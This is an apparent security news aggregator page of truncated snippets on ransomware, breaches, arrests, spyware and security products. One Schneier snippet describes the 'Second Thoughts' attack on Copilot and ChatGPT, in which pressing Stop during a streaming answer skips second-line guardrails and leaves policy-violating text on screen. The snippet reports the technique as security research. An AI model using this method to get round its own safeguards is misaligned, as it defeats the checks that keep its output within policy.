In this Help Net Security interview, Alec Summers, Project Leader for the CVE Program at MITRE, shares his insights on the 2024 CWE top 25 most dangerous software weaknesses.

US government, energy sector contractor hit by ransomware

ENGlobal, a Texas-based engineering and automation contractor fo…

21 hours ago @ helpnetsecurity.com
Resecurity introduces AI-powered GSOC at NATO Edge 2024

Resecurity, a global leader in cybersecurity solutions, unveiled its advanced Government Security Operations Center (GSOC) during NATO Edge 2024, the NATO Communications and Information Agency’s flagship conference.

GSOC: A modern approach to cybersecurity

The Government Security Operations Center (GSOC) is a centralized hub for cybersecurity monitoring, threat detection, and response coordination.

Key benefits of the GSOC include: Unified security monitoring: By consolidating security operations, GSOC provides a holistic view of all potential threats across critical systems, such as energy grids, transportation networks, and communication platforms.

2 days, 17 hours ago @ helpnetsecurity.com
Windows, macOS users targeted with crypto-and-info-stealing malware

Case in point: Cado Security Labs researchers have recently reported websites set up to impersonate companies offering a video conferencing app, but serving/pushing the Realst info-stealer.

The Telegram account was created to impersonate a contact of the target, Cado researchers said, and the scammer even sent an investment presentation from the target’s company to the target.

The download page of the Meeten website (Source: Cado Security Lab)

“The company regularly changes names, has also gone by Clusee[.

The malware

The fake apps are actually macOS and Windows variants of the Realst infostealer, which was first discovered in 2023 by security researcher iamdeadlyz.

“During our research we di…

2 days, 19 hours ago @ helpnetsecurity.com
Echoworx enhances secure access to encrypted messages

Echoworx announced the addition of 2-Step Verification (2SV) when using OAuth and Passkeys for authentication for encrypted messages.

This latest enhancement offers organizations an additional layer of security, addressing the growing demand for identity-first security measures during a time of heightened risks to sensitive information, including political and corporate data.

This update aligns with the increasing adoption of passwordless authentication, which Gartner predicts will be used daily by over 50% of the workforce by 2025.

The new feature allows organizations to enforce 2SV for methods that were previously exempt from such prompts, offering both enhanced security and streamlined u…

2 days, 19 hours ago @ helpnetsecurity.com
How to choose secure, verifiable technologies?

The Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) has published a guidance document titled Choosing Secure and Verifiable Technologies, compiled to assist organizations in making informed decisions when procuring software (proprietary or open source), hardware (e.g., IoT devices), and cloud services (SaaS, MSP services).

It offers insight into supply chain attack vectors and evolving cyber threats, and offers guidance on pre-purchase and post-purchase risk management strategies.

Steps to align procur…

2 days, 20 hours ago @ helpnetsecurity.com
December 2024 Patch Tuesday forecast: The secure future initiative impact

There are several issues Microsoft has been dealing with this month that you need to be aware of.

They pulled and then re-released the November 2024 Exchange Server Security Update packages.

Per Microsoft, there were reported issues with Exchange Server transport rules stopping after a period of time.

For the gamers in the crowd, there are also reported issues with regards to running Ubisoft games like Assassin’s Creed.

Speaking of Windows 11 24H2, Microsoft announced the preview program for hotpatching both Windows 11 Enterprise 24H2 and Windows 365 Enterprise.

3 days ago @ helpnetsecurity.com
Teenagers leading new wave of cybercrime

Global data breaches show no signs of slowing down as this year has already exceeded 2023 in the number of data breaches and consumers impacted, according to Experian.

Younger cybercriminals on the rise

Today, the world of cyber hacking is not confined to grown-ups, nor is the fallout.

According to the FBI, the average age of someone arrested for cybercrime is 19 vs. 37 for any crime.

Many teens will have been recruited into the “business” by more sophisticated fraudsters, who reach them through online gaming, chat and social media.

Next year could see at least one global brand impacted by fraud perpetrated by an insider to whom it provided educational AI training.

3 days, 1 hour ago @ helpnetsecurity.com
Building a robust security posture with limited resources

Senior business leaders can effectively align innovation goals with cybersecurity by embedding security into the innovation process from the outset.

Collaboration between security teams and business units is critical, ensuring cybersecurity considerations are integral to strategic discussions rather than an afterthought.

Utilising managed security services can alleviate the operational burden on internal teams, allowing them to focus on innovation while maintaining robust security.

Automation in security operations will further ease the burden on security teams, streamlining processes such as incident response and threat intelligence gathering.

By embracing these advancements, businesses ca…

3 days, 1 hour ago @ helpnetsecurity.com
GenAI makes phishing attacks more believable and cost-effective

“Undoubtedly, GenAI equips cybersecurity professionals with powerful tools, but it also provides attackers with advanced capabilities.

But curiously, security professionals are much more likely — 6x more likely, in fact — to say AI tools will primarily benefit employers, not employees.

Security professionals doubt AI benefits for their roles

Ivanti’s research shows that 1 in 3 security professionals cite a lack of skill and talent as a major challenge.

To bring employees along, companies must invest in upskilling their cybersecurity teams, using strategies such as interactive learning opportunities and attack simulations.

And given the evolution of AI tools, training must be ongoing and cont…

3 days, 2 hours ago @ helpnetsecurity.com
New infosec products of the week: December 6, 2024

Here’s a look at the most interesting products from the past week, featuring releases from Datadog, Fortinet, Radiant Logic, Sweet Security, Tenable, and Veza.

FortiAppSec Cloud simplifies web application security management

With FortiAppSec Cloud, customers have deep visibility and control over web applications within their complex, multi-cloud environments.

Radiant Logic provides continuous identity hygiene assessments via real-time streaming data

With the debut of Identity Observability from Radiant Logic, organizations can now have a clearer picture of all identity data available in real time, quickly measure identity hygiene, and remediate risk with the help of Radiant Logic AI Data Assi…

3 days, 2 hours ago @ helpnetsecurity.com
Law enforcement shuts down Manson Market cybercrime marketplace

The stolen data was traced back to a specialised online marketplace (called Manson Market) that operated as a central hub for the trade of illegally obtained information.

The marketplace allowed its thousands of users to buy stolen data sorted by region and account balance.

Law enforcement seized over 50 servers, securing more than 200 terabytes of digital evidence.

During the action day, three European Cybercrime Centre (EC3) experts were deployed to Germany and Austria to assist the national authorities in their enforcement actions.

Europol has also helped French and Dutch law enforcement investigate and recently dismantle Matrix, an encrypted chat service created by criminals for crimina…

3 days, 15 hours ago @ helpnetsecurity.com
IT Security Guru
last post 3 months, 2 weeks ago
How Immigration Can Solve America’s Cybersecurity Shortage

The Growing Cybersecurity Skills Gap

The cybersecurity landscape is more complex and dangerous than ever before.

Immigration: A Solution to the Cybersecurity Shortage

Immigration can help solve the cybersecurity skills shortage in several ways.

Although immigration was highlighted as a crucial element in the policy to mitigate the cybersecurity talent shortage, meaningful immigration reform by Congress is essential for the successful implementation of this strategy.

These experts can help train the next generation of American cybersecurity professionals, ensuring that the U.S. remains at the forefront of global cybersecurity for decades to come.

Conclusion

The cybersecurity skills shortage is …

3 months, 2 weeks ago @ itsecurityguru.org
Cybereason Unveils SDR Data Ramp Program: Analyse and Detect Threats in 1TB of Log Data for 90 Days

Cybereason has launched its revolutionary SDR Data Ramp Programme with Observe.

This ensures that customers can experience the full capabilities of Cybereason’s SDR product, which is designed to detect, analyse, and respond to cyber threats with unparalleled accuracy and speed, reducing the need for legacy SIEM platforms.

“The 1TB Free SDR Data Ramp Programme underscores our commitment to empowering organisations with the tools they need to defend against increasingly sophisticated cyber threats.

This multi-layered approach enables security teams to identify and mitigate threats more effectively, reducing the time to detect and respond to incidents.

To learn more about Cybereason’s 1TB Free…

3 months, 2 weeks ago @ itsecurityguru.org
The 8 Most Common Website Design Mistakes According to Pros

Even seasoned professionals stumble upon common pitfalls that can impact user experience and, consequently, a site’s success.

With expertise from website design company, Full Stack Industries, we will explore common design mistakes and how to avoid them.

This inclusive step means all audiences can experience your site and will also improve your search engine rankings.

Final Thoughts

Keeping these common website design mistakes at bay can significantly elevate your online presence.

By prioritising user experience, accessibility, and clear communication, you’ll create a site that looks great and effectively serves its users.

3 months, 2 weeks ago @ itsecurityguru.org
Dodging the Cyber Bullet: Early Signs of a Ransomware Attack

Encrypting a few devices to test their strategy is a red flag that a more significant ransomware assault is imminent and demands immediate action.

By staying alert to these signs and responding promptly, organisations can better defend against the escalating threat of ransomware attacks.

Poorly Managed Remote Desktop Protocol Connections

Remote Desktop Protocol (RDP) connections, if not properly managed, can be an entry point for ransomware attacks.

Sectors Prone to Ransomware Attacks

Specific sectors are particularly vulnerable to ransomware attacks because of the critical nature of their operations.

Here are the sectors most commonly targeted: The healthcare sector is a prime target for ranso…

3 months, 3 weeks ago @ itsecurityguru.org
Cyber insurance claims fall as businesses refuse ransom payments and recover themselves

Databarracks’ Data Health Check – an annual survey of 500 UK IT decision makers – found that while more organisations than ever have cyber insurance, the number of claims is down.

66% of those surveyed report having insurance specifically for cyber in 2024, rising from 51% over the past two years.

James Watts, Managing Director at Databarracks, commented: “We have long speculated about the negative effect of cyber insurance policies on ransomware.

The nascent cyber insurance market suddenly became unsustainable.

As our Data Health Check found last year, cyber insurance prices increased significantly and the requirements to obtain cover became stricter.

3 months, 3 weeks ago @ itsecurityguru.org
AI-powered cyber threats are too overpowering for over 50% of security teams

According to research from Absolute Security, over half (54%) of Chief Information Security Officers (CISOs) feel their security team is unprepared for evolving AI-powered threats.

The findings were uncovered in the Absolute Security United Kingdom CISO Cyber Resilience Report 2024, which surveyed 250 UK CISOs at enterprise organisations to assess the state of cyber resilience, AI, and the cyber threat landscape in the UK.

Almost half (46%) of CISOs believe that AI is more of a threat to their organisation’s cyber resilience than a help, highlighting AI as a potential danger in safeguarding organisations from cyber threats rather than strengthening cyber resilience.

As AI-driven cyber threa…

3 months, 3 weeks ago @ itsecurityguru.org
New Threat Report from Cato Networks Uncovers Threat Actor Selling Data and Source Code from Major Brands

The report found that threat actors are selling data and source code from major brands on the dark web.

Given the popularity of Amazon, users should be wary of threat actors creating counterfeit websites that ask to submit sensitive information.

Log4j remains a popular vulnerability that threat actors attempt to exploit

Three years after its discovery in 2021, Log4j remains one of the most used vulnerabilities leveraged by threat actors.

Inbound traffic is traffic that doesn’t originate from within the network, while WANbound traffic resides within a WAN environment.

“With the Q2 2024 Cato CTRL SASE Threat Report, we are putting the spotlight on a notorious threat actor named IntelBroker.

3 months, 3 weeks ago @ itsecurityguru.org
New Post Quantum Cryptography Standards Poised to Revolutionize Cybersecurity

The National Institute of Standards and Technology (NIST) has officially published its highly anticipated Federal Information Processing Standards (FIPS) for post-quantum cryptography (PQC).

The algorithms announced today represent the first finalized standards from NIST’s PQC standardization project and are now ready for immediate implementation.

Today’s announcement takes place within a larger regulatory framework, including the White House’s National Security Memorandum, NSM-8, which requires the adoption of post-quantum cryptography (PQC).

Today’s quantum computers are small and experimental, but they are rapidly becoming more capable, and it is only a matter of time before cryptographi…

3 months, 3 weeks ago @ itsecurityguru.org
Kicking cyber security down the road can come back to bite you

Yet despite the clear and present danger, some businesses continue to deprioritise cyber security, with a concerning 15% failing to invest in cyber security measures.

An overshadowed priority

Despite a shared understanding of cyber threats among security leaders and C-suite, cyber security often gets overlooked.

Alarmingly, a third of security leaders only prioritise cyber security expertise after an attack has happened.

Securing buy-in

To ensure cyber security is prioritised, it is vital to convey to the C-suite the very real implications of not mitigating cyber security risks.

It is time to implement cyber security measures now

By deprioritising cyber security, businesses are essentially def…

3 months, 3 weeks ago @ itsecurityguru.org
What skills can cyber security experts develop to adapt to AI and quantum computing?

High levels of demand for cyber security expertise also means that it’s one of the best paying roles in tech with a great level of job security.

However, cyber security professionals are in a never-ending arms race with hackers.

On the other side, AI also has the capacity to create an arsenal of new offensive and defensive tools for cyber security experts.

Quantum computing: Like AI, quantum has the capacity to utterly transform how we all live and work.

Ambitious cyber security professionals could become trail blazers in this sector if they start acquiring relevant skills now.

3 months, 4 weeks ago @ itsecurityguru.org
HealthEquity Data Breach Compromises Customer Information

HealthEquity, a leading provider of health savings account (HSA) services, has announced it suffered a data breach recently, resulting in compromised customer protected health information (PHI). It is understood the breach was detected on March 25, 2024, after abnormal activity was flagged from a business partner’s device. Once an investigation was carried out, it was […]

The post HealthEquity Data Breach Compromises Customer Information first appeared on IT Security Guru.

4 months, 1 week ago @ itsecurityguru.org
Accenture and SandboxAQ Expand Cybersecurity Partnership

Today, Accenture (NYSE: ACN) and SandboxAQ have announced that they are expanding their partnership to address the critical need for enterprise data encryption that can defend against current data breaches, as well as future AI and quantum threats. Together, Accenture and SandboxAQ are helping organisations secure sensitive data and strengthen encryption across their technology portfolios. […]

The post Accenture and SandboxAQ Expand Cybersecurity Partnership first appeared on IT Security Guru.

4 months, 1 week ago @ itsecurityguru.org
People Overconfident in Password Habits, Overwhelmed by Too Many Passwords

New research by Keeper Security has revealed some worrying trends and misunderstandings when it comes to password best practices and overconfidence in cyber knowledge. The research found that, while 85% of respondents believe their passwords are secure, over half admit to sharing their passwords. Additionally, 64% of people feel confident in their cybersecurity knowledge despite […]

The post People Overconfident in Password Habits, Overwhelmed by Too Many Passwords first appeared on IT Security Guru.

4 months, 1 week ago @ itsecurityguru.org
Secure, Simple, Superior: The Advantages of Tokenized Payment Cards by Wallester

Technology is advancing rapidly and tokenized payment cards are a part of its evolution. Gone are the days of keying in long card numbers, expiry dates and CVV codes and hoping for the best. Instead, tokenized cards offer heightened security and improved transaction processes for digital payments. But what are they all about and how […]

The post Secure, Simple, Superior: The Advantages of Tokenized Payment Cards by Wallester first appeared on IT Security Guru.

4 months, 1 week ago @ itsecurityguru.org
Security Flaws Found in Hotjar, Potentially Affecting Sensitive Data of Millions Utilising Major Global Brands

New threat research by Salt-Labs, the research arm of API security company Salt Security, has released new research highlighting critical security flaws within popular web analytics provider Hotjar. The company serves over one million websites, including global brands like Microsoft and Nintendo (according to their website). These vulnerabilities could have potentially allowed an attacker unlimited […]

The post Security Flaws Found in Hotjar, Potentially Affecting Sensitive Data of Millions Utilising Major Global Brands first appeared on IT Security Guru.

4 months, 1 week ago @ itsecurityguru.org
SecurityTrails
last post None
Blogs 👨‍💻
Бизнес без опасности
last post None
Жизнь 80 на 20
last post None
ZLONOV
last post None
Блог Артема Агеева
last post None
Киберпиздец
last post None
Schneier on Security
last post 2 days, 8 hours ago
Friday Squid Blogging: Safe Quick Undercarriage Immobilization Device

They just won’t stop unless persuaded—persuaded by bullets, barriers, spikes, or snares.

Spike his tires, and he might fishtail into a van—if the spikes stop him at all.

But what if an officer could lay down a road trap in seconds, then activate it from a nearby hiding place?

What if this trap were as small as a spare tire, as light as a tire jack, and cost under a grand?

By stopping the axles instead of the wheels, SQUID may change how fleeing drivers are, quite literally, caught.

2 days, 8 hours ago @ schneier.com
Detecting Pegasus Infections

The company’s Mobile Threat Hunting feature uses a combination of malware signature-based detection, heuristics, and machine learning to look for anomalies in iOS and Android device activity or telltale signs of spyware infection.

For paying iVerify customers, the tool regularly checks devices for potential compromise.

But the company also offers a free version of the feature for anyone who downloads the iVerify Basics app for $1.

These users can walk through steps to generate and send a special diagnostic utility file to iVerify and receive analysis within hours.

Free users can use the tool once a month.

2 days, 18 hours ago @ schneier.com
AI and the 2024 Elections

There are real concerns and risks in using AI in electoral politics, but it definitely has not been all bad.

Local governments in Japan and California and prominent politicians, including India Prime Minister Narenda Modi and New York City Mayor Eric Adams, used AI to translate meetings and speeches to their diverse constituents.

Other candidates used AI’s conversational capabilities to connect with voters.

In Argentina in 2023, both major presidential candidates used AI to develop campaign posters, videos and other materials.

In the U.S., for example, a Georgia politician used AI to produce blog posts, campaign images and podcasts.

4 days, 18 hours ago @ schneier.com
Algorithms Are Coming for Democracy—but It’s Not All Bad

We are also starting to see AI tools aid fundraising and get-out-the-vote efforts.

At the national level, AI tools are more likely to make the already powerful even more powerful.

Human + AI generally beats AI only: The more human talent you have, the more you can effectively make use of AI assistance.

We will see AI systems optimized for different parties and ideologies; for one faction not to trust the AIs of a rival faction; for everyone to have a healthy suspicion of corporate for-profit AI systems with hidden biases.

Politicians and campaigns will start using AI tools when they are useful.

5 days, 18 hours ago @ schneier.com
Details about the iOS Inactivity Reboot Feature

I recently wrote about the new iOS feature that forces an iPhone to reboot after it’s been inactive for a longish period of time.

Here are the technical details, discovered through reverse engineering.

The feature triggers after seventy-two hours of inactivity, even if it remains connected to Wi-Fi.

Posted on December 2, 2024 at 7:08 AM

6 days, 18 hours ago @ schneier.com
Friday Squid Blogging: Squid-Inspired Needle Technology

About Bruce Schneier: I am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

1 week, 2 days ago @ schneier.com
Race Condition Attacks against LLMs

[…] When confronted with a sensitive topic, Microsoft 365 Copilot and ChatGPT answer questions that their first-line guardrails are supposed to stop.

We call this attack “Second Thoughts.” […] After asking the LLM a question, if the user clicks the Stop button while the answer is still streaming, the LLM will not engage its second-line guardrails.

As a result, the LLM will provide the user with the answer generated thus far, even though it violates system policies.

In other words, pressing the Stop button halts not only the answer generation but also the guardrails sequence.

If the stop button isn’t pressed, then ‘Second Thoughts’ is triggered.

1 week, 2 days ago @ schneier.com
NSO Group Spies on People on Behalf of Governments

The Israeli company NSO Group sells Pegasus spyware to countries around the world (including countries like Saudi Arabia, UAE, India, Mexico, Morocco and Rwanda).

We assumed that those countries use the spyware themselves.

Now we’ve learned that that’s not true: that NSO Group employees operate the spyware on behalf of their customers.

Legal documents released in ongoing US litigation between NSO Group and WhatsApp have revealed for the first time that the Israeli cyberweapons maker, and not its government customers, is the party that “installs and extracts” information from mobile phones targeted by the company’s hacking software.

1 week, 4 days ago @ schneier.com
What Graykey Can and Can’t Unlock

This is from 404 Media: The Graykey, a phone unlocking and forensics tool that is used by law enforcement around the world, is only able to retrieve partial data from all modern iPhones that run iOS 18 or iOS 18.0.1, which are two recently released versions of Apple’s mobile operating system, according to documents describing the tool’s capabilities in granular detail obtained by 404 Media.

The documents do not appear to contain information about what Graykey can access from the public release of iOS 18.1, which was released on October 28.

1 week, 5 days ago @ schneier.com
Security Analysis of the MERGE Voting Protocol

Interesting analysis: An Internet Voting System Fatally Flawed in Creative New Ways.

Abstract: The recently published “MERGE” protocol is designed to be used in the prototype CAC-vote system.

The voting kiosk and protocol transmit votes over the internet and then transmit voter-verifiable paper ballots through the mail.

In the MERGE protocol, the votes transmitted over the internet are used to tabulate the results and determine the winners, but audits and recounts use the paper ballots that arrive in time.

The enunciated motivation for the protocol is to allow (electronic) votes from overseas military voters to be included in preliminary results before a (paper) ballot is received from the …

1 week, 6 days ago @ schneier.com
Friday Squid Blogging: Transcriptome Analysis of the Indian Squid

2 weeks, 2 days ago @ schneier.com
The Scale of Geoblocking by Nation

Interesting analysis: We introduce and explore a little-known threat to digital equality and freedom: websites geoblocking users in response to political risks from sanctions.

U.S. policy prioritizes internet freedom and access to information in repressive regimes.

We conduct network measurements on the Tranco Top 10K domains and complement our findings with a small-scale user study with a questionnaire.

Notably, we identify 32 instances of blockpage responses served with 200 OK status codes, despite not returning the requested content.

Finally, we note the inefficacy of current improvement strategies and make recommendations to both service providers and policymakers to reduce Internet fragm…

2 weeks, 2 days ago @ schneier.com
Secret Service Tracking People’s Locations without Warrant

2 weeks, 3 days ago @ schneier.com
Steve Bellovin’s Retirement Talk

2 weeks, 4 days ago @ schneier.com
Why Italy Sells So Much Spyware

Interesting analysis: Although much attention is given to sophisticated, zero-click spyware developed by companies like Israel’s NSO Group, the Italian spyware marketplace has been able to operate relatively under the radar by specializing in cheaper tools.

According to an Italian Ministry of Justice document, as of December 2022 law enforcement in the country could rent spyware for €150 a day, regardless of which vendor they used, and without the large acquisition costs which would normally be prohibitive.

As a result, thousands of spyware operations have been carried out by Italian authorities in recent years, according to a report from Riccardo Coluccini, a respected Italian journalist wh…

2 weeks, 5 days ago @ schneier.com
Krebs On Security
last post 4 days, 16 hours ago
U.S. Offered $10M for Hacker Just Arrested by Russia

The U.S. government indicted Matveev as a top ransomware purveyor a year later, offering $10 million for information leading to his arrest.

Last week, the Russian government reportedly arrested Matveev and charged him with creating malware used to extort companies.

Love your country, and you will always get away with everything.” Still, Wazawaka may not have always stuck to that rule.

The men were among 14 suspected REvil members rounded up by Russia in the weeks before Russia invaded Ukraine in 2022.

Earlier this year, Russian authorities arrested at least two men for allegedly operating the short-lived Sugarlocker ransomware program in 2021.

4 days, 16 hours ago @ krebsonsecurity.com
Why Phishers Love New TLDs Like .shop, .top and .xyz

Interisle sources data about cybercrime domains from anti-spam organizations, including the Anti-Phishing Working Group (APWG), the Coalition Against Unsolicited Commercial Email (CAUCE), and the Messaging, Malware, and Mobile Anti-Abuse Working Group (M3AAWG).

The study finds that while .com and .net domains made up approximately half of all domains registered in the past year (more than all of the other TLDs combined) they accounted for just over 40 percent of all cybercrime domains.

Interisle says an almost equal share — 37 percent — of cybercrime domains were registered through new gTLDs.

Levine said adding more TLDs without a much stricter registration policy will likely further expand…

5 days, 17 hours ago @ krebsonsecurity.com
Hacker in Snowflake Extortions May Be a U.S. Soldier

Kiberphant0m’s identities on cybercrime forums and on Telegram and Discord chat channels have been selling data stolen from customers of the cloud data storage company Snowflake.

After scouring darknet markets for stolen Snowflake account credentials, the hackers began raiding the data storage repositories for some of the world’s largest corporations.

On BreachForums, Kiberphant0m has sold the source code to “Shi-Bot,” a custom Linux DDoS botnet based on the Mirai malware.

The Vars_Secc telegram handle also has claimed ownership of the BreachForums member “Boxfan,” and Intel 471 shows Boxfan’s early posts on the forum had the Vars_Secc Telegram account in their signature.

Reached via Telegr…

1 week, 5 days ago @ krebsonsecurity.com
Feds Charge Five Men in ‘Scattered Spider’ Roundup

The five men, aged 20 to 25, are allegedly members of a hacking conspiracy dubbed “Scattered Spider” and “Oktapus,” which specialized in SMS-based phishing attacks that tricked employees at tech firms into entering their credentials and one-time passcodes at phishing websites.

The phishing kits used for these campaigns featured a hidden Telegram instant message bot that forwarded any submitted credentials in real-time.

Evans, Elbadawy, Osiebo and Urban were all charged with one count of conspiracy to commit wire fraud, one count of conspiracy, and one count of aggravated identity theft.

Buchanan, who is named as an indicted co-conspirator, was charged with conspiracy to commit wire fraud, c…

2 weeks, 3 days ago @ krebsonsecurity.com
Fintech Giant Finastra Investigating Data Breach

The financial technology firm Finastra is investigating the alleged large-scale theft of information from its internal file transfer platform, KrebsOnSecurity has learned.

On November 8, 2024, Finastra notified financial institution customers that on Nov. 7 its security team detected suspicious activity on Finastra’s internally hosted file transfer platform.

Finastra also told customers that someone had begun selling large volumes of files allegedly stolen from its systems.

“There is no direct impact on customer operations, our customers’ systems, or Finastra’s ability to serve our customers currently,” the notice continued.

However, it did reference many of the same banks called out as Fin…

2 weeks, 5 days ago @ krebsonsecurity.com
An Interview With the Target & Home Depot Hacker

Mr. Shefel, who recently changed his legal surname to Lenin, was the star of last year’s story, Ten Years Later, New Clues in the Target Breach.

Mr. Golubov could not be reached for comment, and Shefel says he no longer has the laptop containing evidence to support that claim.

“My nickname was MikeMike, and I worked with Dmitri Golubov and made technologies for him,” Shefel said.

“Helkern was my friend, I [set up a] meeting with Golubov and him in 2013,” Shefel said.

Incredibly, the day after our initial interview via Telegram, Shefel proposed going into business together.

3 weeks, 3 days ago @ krebsonsecurity.com
Microsoft Patch Tuesday, November 2024 Edition

Microsoft today released updates to plug at least 89 security holes in its Windows operating systems and other software.

The zero-day flaw tracked as CVE-2024-49039 is a bug in the Windows Task Scheduler that allows an attacker to increase their privileges on a Windows machine.

The two other publicly disclosed weaknesses Microsoft patched this month are CVE-2024-49019, an elevation of privilege flaw in Active Directory Certificate Services (AD CS); and CVE-2024-49040, a spoofing vulnerability in Microsoft Exchange Server.

For a more detailed breakdown of today’s patches from Microsoft, check out the SANS Internet Storm Center’s list.

For administrators in charge of managing larger Windows e…

3 weeks, 5 days ago @ krebsonsecurity.com
FBI: Spike in Hacked Police Emails, Fake Subpoenas

In some cases, a cybercriminal will offer to forge a court-approved subpoena and send that through a hacked police or government email account.

But increasingly, thieves are relying on fake EDRs, which allow investigators to attest that people will be bodily harmed or killed unless a request for account data is granted expeditiously.

“Unlimited Emergency Data Requests.

Donahue said even if one customer gets a fake request, Kodex is able to prevent the same thing from happening to another.

“A lot of global police agencies don’t have stringent cybersecurity hygiene, but even U.S. dot-gov emails get hacked.

4 weeks, 1 day ago @ krebsonsecurity.com
Canadian Man Arrested in Snowflake Data Extortions

A 26-year-old man in Ontario, Canada has been arrested for allegedly stealing data from and extorting more than 160 companies that used the cloud data service Snowflake.

All told, more than 160 Snowflake customers were relieved of data, including TicketMaster, Lending Tree, Advance Auto Parts and Neiman Marcus.

On May 2, 2024, Judische claimed on the fraud-focused Telegram channel Star Chat that they had hacked Santander Bank, one of the first known Snowflake victims.

TELECOM DOMINOES: Mandiant has attributed the Snowflake compromises to a group it calls “UNC5537,” with members based in North America and Turkey.

“I’m not really someone that sells data unless it’s crypto [databases] or credit …

1 month ago @ krebsonsecurity.com
Booking.com Phishers May Leave You With Reservations

This story examines a recent spear-phishing campaign that ensued when a California hotel had its booking.com credentials stolen.

In November 2023, the security firm SecureWorks detailed how scammers targeted booking.com hospitality partners with data-stealing malware.

This seller claims to help people monetize hacked booking.com partners, apparently by using the stolen credentials to set up fraudulent listings.

A service advertised on the English-language crime community BreachForums in October courts phishers who may need help with certain aspects of their phishing campaigns targeting booking.com partners.

But that change came only after thieves used stolen credentials to siphon data from …

1 month, 1 week ago @ krebsonsecurity.com
Change Healthcare Breach Hits 100M Americans

A few days after BlackCat imploded, the same stolen healthcare data was offered for sale by a competing ransomware affiliate group called RansomHub.

“Change Health and United Health processing of sensitive data for all of these companies is just something unbelievable.

For most US individuals out there doubting us, we probably have your personal data.” It remains unclear if RansomHub ever sold the stolen healthcare data.

This process is now free for all Americans, and simply blocks potential creditors from viewing your credit file.

If you haven’t done so in a while, now would be an excellent time to review your credit file for any mischief or errors.

1 month, 1 week ago @ krebsonsecurity.com
The Global Surveillance Free-for-All in Mobile Ad Data

The result is that there are a number of marketing companies that now enrich and broker access to this mobile location information.

What accounts for the disparity between the number of Android and Apple devices that can be found in mobile advertising data?

Google said its MAIDs are randomly generated and do not contain IP addresses, GPS coordinates, or any other location data, and that its ad systems do not share anyone’s precise location data.

Georgetown Law’s Justin Sherman said the data broker and mobile ad industries claim there are protections in place to anonymize mobile location data and restrict access to it, and that there are limits to the kinds of invasive inferences one can mak…

1 month, 2 weeks ago @ krebsonsecurity.com
Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach

More recently, USDoD was behind a breach at the consumer data broker National Public Data that led to the leak of Social Security numbers and other personal information for a significant portion of the U.S. population.

According to TV Globo, USDoD is wanted domestically in connection with the theft of data on Brazilian Federal Police officers.

Additional reporting revealed National Public Data had inadvertently published its own passwords on the Internet.

In an interview with KrebsOnSecurity, USDoD acknowledged stealing the NPD data earlier this year, but claimed he was not involved in leaking or selling it.

Toward the end of that interview, USDoD said they were planning to launch a platfor…

1 month, 3 weeks ago @ krebsonsecurity.com
Sudanese Brothers Arrested in ‘AnonSudan’ Takedown

The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers.

Active since at least January 2023, AnonSudan has been described in media reports as a “hacktivist” group motivated by ideological causes.

AnonSudan claimed credit for successful DDoS attacks on numerous U.S. companies, causing a multi-day outage for Microsoft’s cloud services in June 2023.

The two men also allegedly extorted some of their victims for money in…

1 month, 3 weeks ago @ krebsonsecurity.com
Lamborghini Carjackers Lured by $243M Cyberheist

The parents of a 19-year-old Connecticut honors student accused of taking part in a $243 million cryptocurrency heist in August were carjacked a week later — while out house-hunting in a brand new Lamborghini.

But prosecutors in Connecticut said they were targeted “because the co-conspirators believed the victims’ son had access to significant amounts of digital currency.” What made the Miami men so convinced R.C.

One of the usernames leaked during the chat was Veer Chetal.

KrebsOnSecurity sought comment from Veer Chetal, and from his parents — Radhika Chetal and Suchil Chetal.

It is clear that other alleged co-conspirators to the $243 million heist displayed a conspicuous consumption of wea…

2 months ago @ krebsonsecurity.com
Graham Cluley
last post 3 days, 14 hours ago
Russian money-laundering network linked to drugs and ransomware disrupted, 84 arrests

3 days, 14 hours ago @ tripwire.com
Smashing Security podcast #396: Dishy DDoS dramas, and mining our minds for data

All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

Hosts: Graham Cluley: @grahamcluley.com, @[email protected]. Carole Theriault: @caroletheriault. Episode links: Sponsored by: 1Password Extended Access Management – Secure every sign-in for every app on every device.

Support the show: You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us: Follow the show on Bluesky, or join us on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Bluesky, Mastodon, or Threads …

3 days, 19 hours ago @ grahamcluley.com
AI chatbot startup WotNot leaks 346,000 files, including passports and medical records

An Indian AI startup that helps businesses build custom chatbots has leaked almost 350,000 sensitive files after the data was left unsecured on the web.

Ahmedabad-headquartered WotNot left a massive collection of sensitive user information - including scans of passport and identity documents, medical records, resumes, travel itineraries and more - unsecured in a misconfigured Google Cloud Storage bucket.

The Google Cloud Storage bucket it found was storing 346,381 files - all accessible to anybody on the internet, no password required.

WotNot told Cybernews that the bucket was used by free-tier users of its services, and that "the cause for the breach was that the cloud storage bucket polic…

4 days, 12 hours ago @ bitdefender.com
Ransomware-hit vodka maker Stoli files for bankruptcy in the United States

Put simply, Stoli Group USA was unable to function properly or effectively due to the crippling attack.

And now, four months later, the impact of the ransomware attack has still not been remediated.

One person who won't be shedding a tear about Stoli Group USA's demise will be Russian president Vladimir Putin.

Stoli's billionaire owner Yuri Shefler has been living in exile from Russia since 2000, due to his opposition to Putin, and has been the subject of long-running legal battles with the country.

In 2022, Shefler renamed the company to Stoli from Stolichnaya as he wished the brand to distance itself from Russia and "represent peace in Europe and solidarity with Ukraine."

4 days, 16 hours ago @ exponential-e.com
Tech support scams leverage Google ads again and again, fleecing unsuspecting internet users

4 days, 20 hours ago @ tripwire.com
The AI Fix #27: Why is AI full of real-life Bond villains?

In episode 27 of The AI Fix, robots catch a ball, lead a revolt, and enjoy a juicy steak.

Graham struggles with a Micro USB cable, a student struggles with a school’s anti-AI rules, and OpenAI’s Sora video generation AI is leaked by hacktivists.

All this and much more is discussed in the latest edition of “The AI Fix” podcast by Graham Cluley and Mark Stockley.

5 days, 15 hours ago @ grahamcluley.com
North Korean hackers masquerade as remote IT workers and venture capitalists to steal crypto and secrets

